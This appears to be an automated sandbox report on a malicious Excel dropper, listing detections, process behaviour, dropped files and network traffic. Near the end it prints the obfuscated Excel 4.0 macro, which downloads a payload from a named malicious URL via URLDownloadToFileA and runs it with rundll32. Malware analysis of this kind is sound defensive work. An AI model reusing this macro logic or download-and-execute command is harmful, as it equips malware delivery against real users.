
Analysis Report document-447482460.xls

Overview

General Information

Sample Name: document-447482460.xls
Analysis ID: 433165
MD5: c956ee532ca3530d1f8ffa585e6fe375
SHA1: f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
SHA256: 8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330

Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match


Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2580 cmdline: rundll32 ..\nxckew.wle,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author (matched strings listed under each row)
document-447482460.xls | SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth
  • 0x11d56:$e1: Enable Editing
  • 0x11dcb:$e2: Enable Content
document-447482460.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x134a2:$s1: Excel
  • 0x144fd:$s1: Excel
  • 0x37b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-447482460.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

    Sigma Overview

    System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: rundll32 ..\nxckew.wle,DllRegisterServer
  • CommandLine: rundll32 ..\nxckew.wle,DllRegisterServer
  • CommandLine|base64offset|contains: ]
  • Image: C:\Windows\System32\rundll32.exe
  • NewProcessName: C:\Windows\System32\rundll32.exe
  • OriginalFileName: C:\Windows\System32\rundll32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 2436
  • ProcessCommandLine: rundll32 ..\nxckew.wle,DllRegisterServer
  • ProcessId: 2580

    Signature Overview


    AV Detection:

Antivirus / Scanner detection for submitted sample
Source: document-447482460.xls | Avira: detected
Antivirus detection for URL or domain
Source: http://cyh26wcekai02atpeax.com/fera/frid.gif | Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: cyh26wcekai02atpeax.com

    Networking:

Outdated Microsoft Office dropper detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | DNS query: cyh26wcekai02atpeax.com is down (4 identical entries)
Source: unknown | DNS traffic detected: query: cyh26wcekai02atpeax.com replaycode: Server failure (2)
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: cyh26wcekai02atpeax.com
Source: document-447482460.xls | String found in binary or memory: http://cyh26wcekai02atpeax.com/fera/frid.gif
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

    System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6 | Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
Found Excel 4.0 Macro with suspicious formulas
Source: document-447482460.xls | Initial sample: EXEC
Source: document-447482460.xls | OLE indicator, VBA macros: true
Source: document-447482460.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-447482460.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal88.troj.expl.evad.winXLS@3/5@4/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\160F0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRFDAF.tmp
Source: document-447482460.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer (3 identical entries)
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: document-447482460.xls, type: SAMPLE

    Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting11 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

Behavior Graph

[Behavior graph image not included in this extract. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet]

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

Source | Detection | Scanner | Label | Link
document-447482460.xls | 100% | Avira | XF/Agent.B2 |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

Source | Detection | Scanner | Label | Link
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe | (3 identical rows)
http://cyh26wcekai02atpeax.com/fera/frid.gif | 100% | Avira URL Cloud | malware |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe | (3 identical rows)

    Domains and IPs

    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cyh26wcekai02atpeax.com | unknown | unknown | true | | unknown

      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical verdicts) | unknown
http://cyh26wcekai02atpeax.com/fera/frid.gif | document-447482460.xls | true | Avira URL Cloud: malware | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2130864122.0000000001D57000.00000002.00000001.sdmp | false | URL Reputation: safe (3 identical verdicts) | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2130529884.0000000001B70000.00000002.00000001.sdmp | false | | high

                  Contacted IPs

                  No contacted IP infos

                  General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433165
Start date: 11.06.2021
Start time: 12:04:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: document-447482460.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.expl.evad.winXLS@3/5@4/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433165/sample/document-447482460.xls

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\050F0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 62922
Entropy (8bit): 7.6710168506352945
Encrypted: false
SSDEEP: 1536:cnHzWfiqrMMz9Sw3xNhVsSAc2frW2Z1lwASJYZ:cnTWfiqLTnjsSAc2frW2XlyS
MD5: 4473FEFA6A9F351C07873106B8C938AB
SHA1: 62F7E2A76DEE3CB5FD401E614CB4E073A02FD9AA
SHA-256: 705BC9FE56692290560E62CF1A7095F8B8BD42D71EB7CF3DA267D6B43C31AEDE
SHA-512: 69B142DFB1CAA3F8BA944E5D81CC74F018E393C5B15DD982DC1B894C76BD410DFB5AC84ABF3F3741895983F92834D6819803E77C3ABB08AE43347C14E698F8F9
Malicious: false
Reputation: low
                  Preview: .U.n.0....?..........C....I?.&..an.0.........#.z."..G.5.#D.......J..e.....X.I8%.w.- .Z|.4.......[...s...+......|.".... .Zt./g..\z...:e......x0......:V]...R-.6..u~...n.!B0Z.D...S{.j.Zi....Kf...... Y...c.....|C3...D...B.c.._..7.....^..p.i..VP..~.Km..O>.....$...5l$...o....8.4@kB.g.G...y..x.....n.$.x.G.=...3.63...,.r..!......../..o..L..5.gN.#.R.E.u..xvg7.{...)[....>.M.Ja.uO'.....iV.F...x...<.....AL...wh...4.N..._/...m^^g.........PK..........!..%b.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 18:05:52 2021, atime=Fri Jun 11 18:05:52 2021, length=16384, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.481517628504972
Encrypted: false
SSDEEP: 12:85QbKhSLgXg/XAlCPCHaXEKB8VXB/XG44X+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85YKe/XT0K6VX34YeHDDv3q+rNru/
MD5: EAB077F882847D1BE9A8D21F4CC94485
SHA1: 9E890ACC89741D7DD297EBB7332E94B02305993D
SHA-256: A706417477CEB3D58BC3DDF87B86A6095A233912978666736CB5B9302A2B12A1
SHA-512: CA6B9E1A2A24AF4A2DFA0163FDE76203E84DDF1F11C4EAFD14AF54881015D0F4EF680E83ECBD37BACE4CCFD4E649C967652CF53B17FDE7BA93A42E17BF966A97
Malicious: false
Reputation: low
                  Preview: L..................F...........7G...bX..^...bX..^...@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-447482460.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:19 2020, mtime=Fri Jun 11 18:05:52 2021, atime=Fri Jun 11 18:05:52 2021, length=88576, window=hide
Category: dropped
Size (bytes): 2108
Entropy (8bit): 4.539833983921728
Encrypted: false
SSDEEP: 48:8b/XT0ZVXbgNMN+Qh2b/XT0ZVXbgNMN+Q/:8b/XuVXb/+Qh2b/XuVXb/+Q/
MD5: FA5D7C43CCEBB912344C53A3B80EDAB2
SHA1: C317B4BA1F571CE5BCA12A2FE18A8AF2B49A7687
SHA-256: 64A95B43BD8BD5FE9A9AD44F607B24AB2C468AFC4596DB88B52F3A94DB3906C1
SHA-512: 5F9DB72318FC4FAA63AA0DB6B8781299A72659031723FC7512D13CC5053E610301AD7A938C91709F0F2547695D10B00D23FBB3B81523B3391DE73DF3176D0D7E
Malicious: false
Reputation: low
                  Preview: L..................F.... .....\..{...bX..^...Hd..^...Z...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..Z...R.. .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\document-447482460.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W..
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 107
Entropy (8bit): 4.7041366406487235
Encrypted: false
SSDEEP: 3:oyBVomMY9LRRdzprXCZELRRdzprXCmMY9LRRdzprXCv:dj6Y9LzdqELzdSY9Lzd6
MD5: BB13025ED62A6FCDE7091729FEB6334B
SHA1: FEB4612E46438B1EDD8639C21B9E329A9C73D235
SHA-256: 06FC777D7068CDEC783E8D140347BDB24CB737B00FE6195B25BE5B84A2695236
SHA-512: 3805FA3247C49298BA3B8E15A58A928B9A40E714B48C90419711222B939B1537D0547287B3E2B0EE297721CC0D1DFB2D10C11B4E9F9043693A07630863C5D6AA
Malicious: false
Reputation: low
                  Preview: Desktop.LNK=0..[xls]..document-447482460.LNK=0..document-447482460.LNK=0..[xls]..document-447482460.LNK=0..
                  C:\Users\user\Desktop\160F0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Applesoft BASIC program data, first line number 16
Category: dropped
Size (bytes): 122124
Entropy (8bit): 4.287761039391329
Encrypted: false
SSDEEP: 3072:ihcKoSsxzNDZLDZjlbR868O8Ku5LXkxEtjPOtioVjDGUU1qfDlaGGx+cL2QqCAH1:KcKoSsxzNDZLDZjlbR868O8Ku5LXkxEC
MD5: AE66505CC7DCE71E82A33B53148804DE
SHA1: B473F29DEB964E034E8E6544671ECFCEE528FD22
SHA-256: 003330A6475F686A59077FD1E9C67876CC47FFA0667BBD5272010A8097B73E69
SHA-512: 47BD64CA95D72BD7052E5FAB0414D02317804EA06641FF923248324A81DCADC11C8D9B4A30ED8AA0AC20D47C6BB162ADAE6FF133211FC646204FCA159B814389
Malicious: false
Reputation: low
                  Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                  Static File Info

                  General

File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 26 09:29:22 2021, Security: 0
Entropy (8bit): 3.4145380978437365
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name: document-447482460.xls
File size: 88576
MD5: c956ee532ca3530d1f8ffa585e6fe375
SHA1: f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
SHA256: 8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330
SHA512: 16092ee5da7b51801fa3a002f7ef54e01376a330b4bd2bfb286f2d668402b32acf9cdc139e98193ed73d4148fb7f86e515534d0124aeb63f85162ddff72cb861
SSDEEP: 1536:tIcKoSsxz1PDZLDZjlbR868O8KWc03Y7uDphYHceXVhca+fMHLtyeGx2zZ8dIOil:tIcKoSsxzNDZLDZjlbR868O8KWc03Y7D
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash: e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type: OLE
                  Number of OLE Files: 1

                  OLE File "document-447482460.xls"

                  Indicators

                  Has Summary Info: True
                  Application Name: Microsoft Excel
                  Encrypted Document: False
                  Contains Word Document Stream: False
                  Contains Workbook/Book Stream: True
                  Contains PowerPoint Document Stream: False
                  Contains Visio Document Stream: False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros: True

                  Summary

                  Code Page: 1251
                  Author:
                  Last Saved By:
                  Create Time: 2006-09-16 00:00:00
                  Last Saved Time: 2021-02-26 09:29:22
                  Creating Application: Microsoft Excel
                  Security: 0

                  Document Summary

                  Document Code Page: 1251
                  Thumbnail Scaling Desired: False
                  Contains Dirty Links: False
                  Shared Document: False
                  Changed Hyperlinks: False
                  Application Version: 917504

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path: \x5DocumentSummaryInformation
                  File Type: data
                  Stream Size: 4096
                  Entropy: 0.318330155209
                  Base64 Encoded: False
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path: \x5SummaryInformation
                  File Type: data
                  Stream Size: 4096
                  Entropy: 0.253094628
                  Base64 Encoded: False
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 78310
                  General
                  Stream Path: Workbook
                  File Type: Applesoft BASIC program data, first line number 16
                  Stream Size: 78310
                  Entropy: 3.6159661459
                  Base64 Encoded: True

                  Macro 4.0 Code

                  ,,,,,,,,,,,,,,,egist,,,,,,,,,,,,,,,,,,erServer,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\nxckew.wle,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nlo,adTo,,,,,,,,,,,,,,,,,Fi,le,,,,,,,,,,,,,,,,,Dow,,,,,,,,,,,,,,,,,,U,R,,,,,,"=FORMULA.FILL(before.2.2.29.sheet!AR19&""2 "",AD15)","=FORMULA.FILL(before.2.2.29.sheet!AS19,AE15)","=FORMULA.FILL(before.2.2.29.sheet!AU14,AF15)","=FORMULA.FILL(AS3&AS4,AG15)",,,,,,,,,,,,,,UR,LMon,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),=AG14(),=AL19(),,,,,,,,,,,,,,,,,=before.2.2.29.sheet!AL24(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AF15&AV14,AO13&AP13&""L""&AO12&AO10&AP10&AO11&AP11&""A"",AN19&AN20,0,Doc2!AA100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AS8,0)",,JJC,,,,rundll3,",DllR",,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AD15&before.2.2.29.sheet!AS8&before.2.2.29.sheet!AE15&AG15)",,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  06/11/21-12:05:59.991593 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                  06/11/21-12:06:01.008111 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8
                  06/11/21-12:06:03.025969 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.22 | 8.8.8.8

                  Network Port Distribution

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jun 11, 2021 12:05:54.909857035 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jun 11, 2021 12:05:55.921636105 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jun 11, 2021 12:05:56.936053038 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jun 11, 2021 12:05:58.948674917 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jun 11, 2021 12:05:58.979480982 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                  Jun 11, 2021 12:05:59.990859985 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                  Jun 11, 2021 12:06:01.005148888 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                  Jun 11, 2021 12:06:03.025798082 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                  ICMP Packets

                  Timestamp | Source IP | Dest IP | Checksum | Code | Type
                  Jun 11, 2021 12:05:59.991592884 CEST | 192.168.2.22 | 8.8.8.8 | d00d | (Port unreachable) | Destination Unreachable
                  Jun 11, 2021 12:06:01.008111000 CEST | 192.168.2.22 | 8.8.8.8 | d00d | (Port unreachable) | Destination Unreachable
                  Jun 11, 2021 12:06:03.025969028 CEST | 192.168.2.22 | 8.8.8.8 | d00d | (Port unreachable) | Destination Unreachable

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
